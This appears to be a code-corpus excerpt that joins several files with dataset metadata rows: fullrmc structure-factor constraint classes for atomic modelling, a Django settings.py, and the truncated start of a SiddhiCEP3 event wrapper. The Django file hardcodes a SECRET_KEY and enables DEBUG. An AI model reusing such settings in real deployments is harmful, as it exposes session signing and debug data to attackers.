weighting = "neutronCohb"
assert is_element_property(weighting),LOGGER.error( "weighting is not a valid pdbparser atoms database entry")
assert weighting != "atomicFormFactor", LOGGER.error("atomicFormFactor weighting is not allowed")
self.__weighting = weighting
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__weighting': self.__weighting})
def set_atoms_weight(self, atomsWeight):
"""
Set custom atoms weight. This is the way to set atoms weights
different from those of the given weighting scheme.
:Parameters:
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
atoms element and values are custom weights. If None is given
or partially given, missing elements weighting will be fully set
using the given weighting scheme.
"""
if atomsWeight is None:
AW = {}
else:
assert isinstance(atomsWeight, dict),LOGGER.error("atomsWeight must be None or a dictionary")
AW = {}
for k in atomsWeight:
assert isinstance(k, basestring),LOGGER.error("atomsWeight keys must be strings")
try:
val = float(atomsWeight[k])
except:
raise LOGGER.error( "atomsWeight values must be numerical")
AW[k]=val
# set atomsWeight
self.__atomsWeight = AW
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__atomsWeight': self.__atomsWeight})
def set_window_function(self, windowFunction):
"""
Set convolution window function.
:Parameters:
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
artificial wrinkles; the main reason, among others, is that
G(r) is computed by applying a sine Fourier transform to the
experimental structure factor S(q). Therefore the window function is
used to best imitate the numerical artefacts in the experimental
data.
"""
if windowFunction is not None:
assert isinstance(windowFunction, np.ndarray), LOGGER.error("windowFunction must be a numpy.ndarray")
assert windowFunction.dtype.type is FLOAT_TYPE, LOGGER.error("windowFunction type must be %s"%FLOAT_TYPE)
assert len(windowFunction.shape) == 1, LOGGER.error("windowFunction must be of dimension 1")
assert len(windowFunction) <= self.experimentalData.shape[0], LOGGER.error("windowFunction length must be smaller than experimental data")
# normalize window function
windowFunction /= np.sum(windowFunction)
# check window size
# set windowFunction
self.__windowFunction = windowFunction
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__windowFunction': self.__windowFunction})
def set_experimental_data(self, experimentalData):
"""
Set constraint's experimental data.
:Parameters:
#. experimentalData (numpy.ndarray, string): The experimental
data as numpy.ndarray or string path to load data using
numpy.loadtxt function.
"""
# get experimental data
super(StructureFactorConstraint, self).set_experimental_data(experimentalData=experimentalData)
# set limits
self.set_limits(self.limits)
def set_limits(self, limits):
"""
Set the reciprocal distance limits (qmin, qmax).
:Parameters:
#. limits (None, tuple, list): Distance limits to bound
experimental data and compute histograms.
If None is given, the limits will be automatically set to
min and max reciprocal distance recorded in experimental data.
If given, a tuple of minimum reciprocal distance (qmin) or None
and maximum reciprocal distance (qmax) or None should be given.
"""
self._ExperimentalConstraint__set_limits(limits)
# set qvalues
self.__experimentalQValues = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,0].astype(FLOAT_TYPE)
self.__experimentalSF = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,1].astype(FLOAT_TYPE)
# set qmin and qmax
self.__qmin = self.__experimentalQValues[0]
self.__qmax = self.__experimentalQValues[-1]
assert self.__qmin>0, LOGGER.error("qmin must be bigger than 0. Experimental null q values are ambiguous. Try setting limits.")
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__experimentalQValues': self.__experimentalQValues,
'_StructureFactorConstraint__experimentalSF' : self.__experimentalSF,
'_StructureFactorConstraint__qmin' : self.__qmin,
'_StructureFactorConstraint__qmax' : self.__qmax})
# set used dataWeights
self._set_used_data_weights(limitsIndexStart=self.limitsIndexStart, limitsIndexEnd=self.limitsIndexEnd)
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def update_standard_error(self):
""" Compute and set constraint's standardError."""
# set standardError
totalSQ = self.get_constraint_value()["total_no_window"]
self.set_standard_error(self.compute_standard_error(modelData = totalSQ))
def check_experimental_data(self, experimentalData):
"""
Check whether experimental data is correct.
:Parameters:
#. experimentalData (object): The experimental data to check.
:Returns:
#. result (boolean): Whether it is correct or not.
#. message (str): Checking message that explains what's wrong
with the given data.
"""
if not isinstance(experimentalData, np.ndarray):
return False, "experimentalData must be a numpy.ndarray"
if experimentalData.dtype.type is not FLOAT_TYPE:
return False, "experimentalData type must be %s"%FLOAT_TYPE
if len(experimentalData.shape) !=2:
return False, "experimentalData must be of dimension 2"
if experimentalData.shape[1] !=2:
return False, "experimentalData must have only 2 columns"
# check distances order
inOrder = (np.array(sorted(experimentalData[:,0]), dtype=FLOAT_TYPE)-experimentalData[:,0])<=PRECISION
if not np.all(inOrder):
return False, "experimentalData distances are not sorted in order"
if experimentalData[0][0]<0:
return False, "experimentalData distances min value is found negative"
# data format is correct
return True, ""
def compute_standard_error(self, modelData):
"""
Compute the standard error (StdErr) as the squared deviations
between model computed data and the experimental ones.
.. math::
StdErr = \\sum \\limits_{i}^{N} W_{i}(Y(X_{i})-F(X_{i}))^{2}
Where:\n
:math:`N` is the total number of experimental data points. \n
:math:`W_{i}` is the data point weight. It becomes equivalent to 1 when dataWeights is set to None. \n
:math:`Y(X_{i})` is the experimental data point :math:`X_{i}`. \n
:math:`F(X_{i})` is the computed from the model data :math:`X_{i}`. \n
:Parameters:
#. modelData (numpy.ndarray): The data to compare with the
experimental one and compute the squared deviation.
:Returns:
#. standardError (number): The calculated constraint's
standardError.
"""
# compute difference
diff = self.__experimentalSF-modelData
# return standard error
if self._usedDataWeights is None:
return np.add.reduce((diff)**2)
else:
return np.add.reduce(self._usedDataWeights*((diff)**2))
def _get_Sq_from_Gr(self, Gr):
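# sine Fourier transform of G(r) using the precomputed kernel:
# S(q) = 1 + sum_r G(r)*dr*sin(q*r)/q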
return np.sum(Gr.reshape((-1,1))*self.__Gr2SqMatrix, axis=0)+1
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*(Sq-1) + 1
return Sq
def __get_total_Sq(self, data, rho0):
"""This method is created just to speed up the computation of
the total Sq upon fitting."""
Gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
if idi == idj:
Nij = ni*(ni-1)/2.0
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["inter"][idi,idj,:]
Gr += wij*nij/Dij
else:
Nij = ni*nj
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["intra"][idj,idi,:] + data["inter"][idi,idj,:]+data["inter"][idj,idi,:]
Gr += wij*nij/Dij
# Divide by shells volume
Gr /= self.shellVolumes
# compute total G(r)
#rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0)*(Gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
# compute adjusted/fitted scale factor
self._fittedScaleFactor = self.get_adjusted_scale_factor(self.__experimentalSF, Sq, self._usedDataWeights)
# apply scale factor
Sq = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
Sq = self._apply_multiframe_prior(Sq)
# convolve total with window function
if self.__windowFunction is not None:
Sq = np.convolve(Sq, self.__windowFunction, 'same')
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
"""Overload to reduce S(q) prior to fitting scale factor.
S(q) -> 1 at high q and fitting against the raw values would create a
wrong scale factor. Overloading could be avoided but it is kept for performance reasons.
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData-1, modelData-1, dataWeights)
return SF
def _get_constraint_value(self, data, applyMultiframePrior=True):
# http://erice2011.docking.org/upload/Other/Billinge_PDF/03-ReadingMaterial/BillingePDF2011.pdf page 6
#import time
#startTime = time.clock()
output = {}
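# partial structure factors are accumulated per element pair, split into
# intra- and inter-molecular contributions, then Fourier transformed to S(q)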
for pair in self.__elementsPairs:
output["sf_intra_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_inter_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_total_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
if idi == idj:
Nij = ni*(ni-1)/2.0
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:]
else:
Nij = ni*nj
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:] + data["intra"][idj,idi,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:] + data["inter"][idj,idi,:]
# compute g(r)
nij = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
dij = nij/self.__shellVolumes
Dij = Nij/self.engine.volume
gr += wij*dij/Dij
# calculate intensityFactor
intensityFactor = (self.engine.volume*wij)/(Nij*self.__shellVolumes)
# divide by factor
output["sf_intra_%s-%s" % pair] *= intensityFactor
output["sf_inter_%s-%s" % pair] *= intensityFactor
output["sf_total_%s-%s" % pair] = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
# Compute S(q) from G(r)
output["sf_intra_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_intra_%s-%s" % pair])
output["sf_inter_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_inter_%s-%s" % pair])
output["sf_total_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_total_%s-%s" % pair])
# compute total G(r)
rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0) * (gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
# multiply by scale factor
output["total_no_window"] = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
if applyMultiframePrior:
output["total_no_window"] = self._apply_multiframe_prior(output["total_no_window"])
# convolve total with window function
if self.__windowFunction is not None:
output["total"] = np.convolve(output["total_no_window"], self.__windowFunction, 'same').astype(FLOAT_TYPE)
else:
output["total"] = output["total_no_window"]
return output
def get_constraint_value(self, applyMultiframePrior=True):
"""
Compute all partial Structure Factor (SQs).
:Parameters:
#. applyMultiframePrior (boolean): Whether to apply subframe weight
and prior to the total. This will only have an effect when used
frame is a subframe and in case subframe weight and prior is
defined.
:Returns:
#. SQs (dictionary): The SQs dictionary, where keys are the
element wise intra and inter molecular SQs and values are
the computed SQs.
"""
if self.data is None:
LOGGER.warn("data must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.data, applyMultiframePrior=applyMultiframePrior)
def get_constraint_original_value(self):
"""
Compute all partial Structure Factors (SQs) from the constraint's
original data.
:Returns:
#. SQs (dictionary): The SQs dictionary, where keys are the
element wise intra and inter molecular SQs and values are the
computed SQs.
"""
if self.originalData is None:
LOGGER.warn("originalData must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.originalData)
@reset_if_collected_out_of_date
def compute_data(self, update=True):
""" Compute constraint's data.
:Parameters:
#. update (boolean): whether to update constraint data and
standard error with new computation. If data is computed and
updated by another thread or process while the stochastic
engine is running, this might lead to a state alteration of
the constraint which will lead to no additional accepted
moves in the run.
:Returns:
#. data (dict): constraint data dictionary
#. standardError (float): constraint standard error
"""
intra,inter = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# create data and compute standard error
data = {"intra":intra, "inter":inter}
totalSQ = self.__get_total_Sq(data, rho0=self.engine.numberDensity)
stdError = self.compute_standard_error(modelData = totalSQ)
# update
if update:
self.set_data(data)
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
self.set_standard_error(stdError)
# set original data
if self.originalData is None:
self._set_original_data(self.data)
# return
return data, stdError
def compute_before_move(self, realIndexes, relativeIndexes):
"""
Compute constraint before move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
"""
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
self.set_active_atoms_data_before_move( {"intra":intraM-intraF, "inter":interM-interF} )
self.set_active_atoms_data_after_move(None)
def compute_after_move(self, realIndexes, relativeIndexes, movedBoxCoordinates):
"""
Compute constraint after move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
#. movedBoxCoordinates (numpy.ndarray): The moved atoms new coordinates.
"""
# change coordinates temporarily
boxData = np.array(self.engine.boxCoordinates[relativeIndexes], dtype=FLOAT_TYPE)
self.engine.boxCoordinates[relativeIndexes] = movedBoxCoordinates
# calculate pair distribution function
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# set active atoms data
self.set_active_atoms_data_after_move( {"intra":intraM-intraF, "inter":interM-interF} )
# reset coordinates
self.engine.boxCoordinates[relativeIndexes] = boxData
# compute standardError after move
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
totalSQ = self.__get_total_Sq({"intra":dataIntra, "inter":dataInter}, rho0=self.engine.numberDensity)
self.set_after_move_standard_error( self.compute_standard_error(modelData = totalSQ) )
# increment tried
self.increment_tried()
def accept_move(self, realIndexes, relativeIndexes):
"""
Accept move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
# change permanently _data
self.set_data( {"intra":dataIntra, "inter":dataInter} )
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_standard_error( self.afterMoveStandardError )
self.set_after_move_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
# increment accepted
self.increment_accepted()
def reject_move(self, realIndexes, relativeIndexes):
"""
Reject move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_after_move_standard_error( None )
def compute_as_if_amputated(self, realIndex, relativeIndex):
"""
Compute and return constraint's data and standard error as if
given atom is amputated.
:Parameters:
#. realIndex (numpy.ndarray): Atom's index as a numpy array
of a single element.
#. relativeIndex (numpy.ndarray): Atom's relative index as a
numpy array of a single element.
"""
# compute data
self.compute_before_move(realIndexes=realIndex, relativeIndexes=relativeIndex)
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]
data = {"intra":dataIntra, "inter":dataInter}
# temporarily adjust self.__weightingScheme
weightingScheme = self.__weightingScheme
relativeIndex = relativeIndex[0]
selectedElement = self.engine.allElements[relativeIndex]
self.engine.numberOfAtomsPerElement[selectedElement] -= 1
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight )
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
## END OF ADDED 08 FEB 2017
# compute standard error
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
SF = self.adjustScaleFactorFrequency
self._set_adjust_scale_factor_frequency(0)
rho0 = ((self.engine.numberOfAtoms-1)/self.engine.volume).astype(FLOAT_TYPE)
totalSQ = self.__get_total_Sq(data, rho0=rho0)
standardError = self.compute_standard_error(modelData = totalSQ)
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
self._set_adjust_scale_factor_frequency(SF)
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
# set amputation
self.set_amputation_data( {'data':data, 'weightingScheme':self.__weightingScheme} )
# compute standard error
self.set_amputation_standard_error( standardError )
# reset weightingScheme and number of atoms per element
self.__weightingScheme = weightingScheme
self.engine.numberOfAtomsPerElement[selectedElement] += 1
def accept_amputation(self, realIndex, relativeIndex):
"""
Accept amputated atom and set constraint's data and standard error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
#. relativeIndex (numpy.ndarray): Not used here.
"""
#self.set_data( self.amputationData ) ## COMMENTED 08 FEB 2017
self.set_data( self.amputationData['data'] )
self.__weightingScheme = self.amputationData['weightingScheme']
self.set_standard_error( self.amputationStandardError )
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
def reject_amputation(self, realIndex, relativeIndex):
"""
Reject amputated atom and set constraint's data and standard
error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
#. relativeIndex (numpy.ndarray): Not used here.
"""
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
def _on_collector_collect_atom(self, realIndex):
pass
def _on_collector_release_atom(self, realIndex):
pass
def _constraint_copy_needs_lut(self):
return {'_StructureFactorConstraint__elementsPairs' :'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__histogramSize' :'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__weightingScheme' :'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__shellVolumes' :'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__shellCenters' :'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__windowFunction' :'_StructureFactorConstraint__windowFunction',
'_StructureFactorConstraint__experimentalQValues' :'_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF' :'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__Gr2SqMatrix' :'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__minimumDistance' :'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance' :'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin' :'_StructureFactorConstraint__bin',
'_ExperimentalConstraint__scaleFactor' :'_ExperimentalConstraint__scaleFactor',
'_ExperimentalConstraint__dataWeights' :'_ExperimentalConstraint__dataWeights',
'_ExperimentalConstraint__multiframePrior' :'_ExperimentalConstraint__multiframePrior',
'_ExperimentalConstraint__multiframeWeight' :'_ExperimentalConstraint__multiframeWeight',
'_ExperimentalConstraint__limits' :'_ExperimentalConstraint__limits',
'_ExperimentalConstraint__limitsIndexStart' :'_ExperimentalConstraint__limitsIndexStart',
'_ExperimentalConstraint__limitsIndexEnd' :'_ExperimentalConstraint__limitsIndexEnd',
'_Constraint__used' :'_Constraint__used',
'_Constraint__data' :'_Constraint__data',
'_Constraint__state' :'_Constraint__state',
'_Constraint__standardError' :'_Constraint__standardError',
'_fittedScaleFactor' :'_fittedScaleFactor',
'_usedDataWeights' :'_usedDataWeights',
'_Engine__state' :'_Engine__state',
'_Engine__boxCoordinates' :'_Engine__boxCoordinates',
'_Engine__basisVectors' :'_Engine__basisVectors',
'_Engine__isPBC' :'_Engine__isPBC',
'_Engine__moleculesIndex' :'_Engine__moleculesIndex',
'_Engine__elementsIndex' :'_Engine__elementsIndex',
'_Engine__numberOfAtomsPerElement' :'_Engine__numberOfAtomsPerElement',
'_Engine__elements' :'_Engine__elements',
'_Engine__numberDensity' :'_Engine__numberDensity',
'_Engine__volume' :'_Engine__volume',
'_Engine__realCoordinates' :'_Engine__realCoordinates',
'_atomsCollector' :'_atomsCollector',
('engine','_atomsCollector') :'_atomsCollector',
}
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
class ReducedStructureFactorConstraint(StructureFactorConstraint):
"""
The Reduced Structure Factor, which we will also denote S(Q),
is exactly the same quantity as the Structure Factor but with
the slight difference that it is normalized to 0 rather than 1
and therefore :math:`<S(Q)>=0`.
The computation of S(Q) is done through a Sine inverse Fourier transform
of the computed pair distribution function noted as G(r).
.. math::
S(Q) = \\frac{1}{Q} \\int_{0}^{\\infty} G(r) \\sin(Qr) dr
The only reason why the Reduced Structure Factor is implemented is that
many experimental data sets are treated in this form, and it is convenient
not to manipulate the experimental data every time.
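.. code-block:: python
# a minimal illustrative sketch assuming an engine set up exactly as in
# the StructureFactorConstraint example and a reduced S(q)-1 data file
from fullrmc.Constraints.StructureFactorConstraints import ReducedStructureFactorConstraint
RSFC = ReducedStructureFactorConstraint(experimentalData="sq-1.dat", weighting="atomicNumber")
ENGINE.add_constraints(RSFC)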
"""
def _get_Sq_from_Gr(self, Gr):
return np.sum(Gr.reshape((-1,1))*self.Gr2SqMatrix, axis=0)
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*Sq
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
""" dummy overload that does exactly the same thing
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData, modelData, dataWeights)
return SF
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)-1$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
| agpl-3.0 | 7,406,735,951,820,464,000 | 49.032659 | 178 | 0.575891 | false |
pedroluislopez/candidaturas | candidaturas/settings.py | 1 | 2424 | """
Django settings for candidaturas project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.conf.global_settings import MEDIA_URL
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^-c)soc5oay)1a74+8$xe!jf)3@lro!1^xaxscz$f$peju@xto'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'candidatos',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'candidaturas.urls'
WSGI_APPLICATION = 'candidaturas.wsgi.application'
DATABASE_NAME = ''
DATABASE_USER = ''
DATABASE_PASSWORD = ''
try:
from local_settings import *
except ImportError:
pass
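# local_settings.py is expected to provide the deployment specific values
# used below; an illustrative (non-authoritative) example:
# DATABASE_NAME = 'candidaturas'
# DATABASE_USER = 'candidaturas_user'
# DATABASE_PASSWORD = 'change-me'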
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': DATABASE_NAME,
'USER': DATABASE_USER,
'PASSWORD': DATABASE_PASSWORD,
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'es'
TIME_ZONE = 'Europe/Madrid'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
| gpl-3.0 | -6,178,601,633,671,091,000 | 23.484848 | 71 | 0.720297 | false |
madhawav/SiddhiCEPPythonAPI | SiddhiCEP3/core/event/ComplexEvent.py | 1 | 3787 | from enum import Enum
from SiddhiCEP3 import SiddhiLoader
from SiddhiCEP3.DataTypes.DataWrapper import unwrapData, wrapData
class ComplexEvent(object):
class Type(Enum):
CURRENT = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().CURRENT(),
EXPIRED = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().EXPIRED(),
TIMER = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().TIMER(),
RESET = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().RESET()
@classmethod
def _map_value(cls, type_proxy):
type_value = None
if type_proxy.isValueCurrent():
type_value = ComplexEvent.Type.CURRENT
elif type_proxy.isValueExpired():
type_value = ComplexEvent.Type.EXPIRED
elif type_proxy.isValueTimer():
type_value = ComplexEvent.Type.TIMER
elif type_proxy.isValueReset():
type_value = ComplexEvent.Type.RESET
else:
raise TypeError("Unknown Complex Event Type")
return ComplexEvent.Type(type_value)
def __init__(self,):
raise NotImplementedError("Complex Event is Abstract")
def __new__(cls):
bare_instance = object.__new__(cls)
bare_instance._complex_event_proxy = None
return bare_instance
@classmethod
def _fromComplexEventProxy(cls, complex_event_proxy):
'''
Internal constructor to wrap around the Java ComplexEvent interface.
:param complex_event_proxy: Java proxy object of the ComplexEvent
:return: wrapped ComplexEvent instance, or None if the proxy is None
'''
if complex_event_proxy is None:
return None
instance = cls.__new__(cls)
instance._complex_event_proxy = complex_event_proxy
return instance
def getNext(self):
next_proxy = self._complex_event_proxy.getNext()
return ComplexEvent._fromComplexEventProxy(next_proxy)
def setNext(self, next_event):
self._complex_event_proxy.setNext(next_event._complex_event_proxy)
next = property(getNext, setNext)
def getOutputData(self):
